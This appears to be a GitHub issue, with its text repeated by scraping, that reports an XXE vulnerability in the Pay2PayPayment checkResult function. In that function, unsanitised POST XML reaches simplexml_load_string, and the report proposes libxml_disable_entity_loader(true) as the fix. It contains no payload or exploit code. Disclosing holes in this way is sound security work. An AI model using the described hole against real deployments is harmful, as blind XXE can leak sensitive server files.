The user input($_POST['xml']) has been put into simplexml_load_string without sanitation.
Although this parser does not print anything, attackers could also use blind XXE to get sensitive information.
You could use libxml_disable_entity_loader(true); to avoid this vulnerability. Thx
The text was updated successfully, but these errors were encountered:
In class Pay2PayPayment(application\components\payment\Pay2PayPayment.php), there is an XXE vulnerability in checkResult function.
The user input($_POST['xml']) has been put into simplexml_load_string without sanitation.
Although this parser does not print anything, attackers could also use blind XXE to get sensitive information.
You could use
libxml_disable_entity_loader(true);to avoid this vulnerability. ThxThe text was updated successfully, but these errors were encountered: